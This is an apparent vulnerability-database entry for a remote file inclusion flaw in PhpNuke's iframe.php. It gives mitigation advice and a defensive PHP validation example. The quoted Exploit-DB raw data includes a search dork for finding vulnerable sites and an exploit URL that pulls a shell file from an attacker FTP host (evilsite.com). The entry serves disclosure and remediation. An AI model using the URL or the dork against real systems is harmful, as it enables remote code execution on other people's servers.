vendor: PhpNuke
by: Cold z3ro
N/A
CVSS
HIGH
Remote File Include
CWE
Product Name: PhpNuke
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

iFRAME for PhpNuke (iframe.php) Remote File Include Vulnerabilities

The iFRAME for PhpNuke script (iframe.php) is vulnerable to remote file inclusion. The script passes the 'file' parameter from the URL to include() after checking only that the value ends in .htm, .html or .php, so an attacker can make it include a remote file. This can lead to remote code execution and compromise of the affected system.

Mitigation:

To mitigate this vulnerability, it is recommended to apply the latest patch or update from the vendor. Additionally, ensure that the 'file' parameter is properly validated and sanitized before including it in any file inclusion operation.
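
One way to do the validation described above, as an added example that is not PhpNuke or module code: it replaces the suffix-only check quoted in the advisory below with scheme rejection, an extension allow-list and directory confinement. The names PAGES_DIR and resolve_iframe_page(), and the restriction to static .htm/.html pages, are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not PhpNuke or module code. PAGES_DIR and
// resolve_iframe_page() are hypothetical names.
const PAGES_DIR = __DIR__ . '/iframe_pages'; // assumed directory of static pages

// Map the user-supplied 'file' value to a real file under $baseDir, or null.
function resolve_iframe_page($requested, string $baseDir = PAGES_DIR): ?string
{
    // Reject arrays (?file[]=x), empty values and embedded NUL bytes.
    if (!is_string($requested) || $requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // A leading scheme (ftp://, http://, php://, data:) selects a stream
    // wrapper; the original suffix test never looked at this.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $requested) === 1) {
        return null;
    }
    // Static pages only (assumption): compare the parsed extension.
    $ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
    if (!in_array($ext, ['htm', 'html'], true)) {
        return null;
    }
    // realpath() collapses ../ and symlinks and returns false if missing.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // The resolved file must still sit inside the pages directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed inputs; the value is whether a path should be returned.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'iframe_pages_' . getmypid();
mkdir($dir);
file_put_contents($dir . DIRECTORY_SEPARATOR . 'about.html', '<p>about</p>');
$cases = [
    'about.html'                          => true,
    'ftp://user:pass@host.example/x.html' => false,
    '../../../etc/passwd.html'            => false,
    'about.php'                           => false,
];
foreach ($cases as $input => $expected) {
    $path = resolve_iframe_page($input, $dir);
    printf("%-4s %s\n", ($path !== null) === $expected ? 'ok' : 'FAIL', $input);
}
// In the page handler, readfile($path) sends the bytes as-is; include() would execute them.
unlink($dir . DIRECTORY_SEPARATOR . 'about.html'); rmdir($dir);
```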
Source

Exploit-DB raw data:

######################################################
#
# iFRAME for PhpNuke (iframe.php) Remote File Include Vulnerabilities
#
######################################################
#
# script :http://www.desarrollonuke.org
#         http://up.9q9q.net/up/index.php?f=uTRRQnIjG
#
######################################################
#
# file :  iframe.php
#
######################################################
#
# Dork : "/nuke/iframe.php"
#
######################################################
#
# Found by & Contact : Cold z3ro , Cold-z3ro@hotmail.com , http://hack-teach.com/
#
######################################################
#       if(substr($file,-4)!=".htm" && substr($file,-5)!=".html" && substr($file,-4)!=".php"){
#                       echo "ERROR: ONLY html, htm or php FILES";
#                       CloseTable();
#               } else {
#               include ($file);
#               }
#
######################################################
#
# exploit :
http://www.example.com/nuke_path/iframe.php?file=ftp://user:pass@evilsite.com/public_html/shell.html (or) .htm
#
######################################################


----  GreeTz: |MoHaNdKo|  |Cold One|  |Cold ThreE| |Viper Hacker| |The Wolf
KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell|
             |Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke|
|Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
             |Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C|
|Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
             | The Sniper | . ||| Team Hell ||| | DearMan | |Pro Hacker| |
020 | | abdulla00 " alz3eem" | | The_Viper |
             All i know


#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

# milw0rm.com [2007-03-18]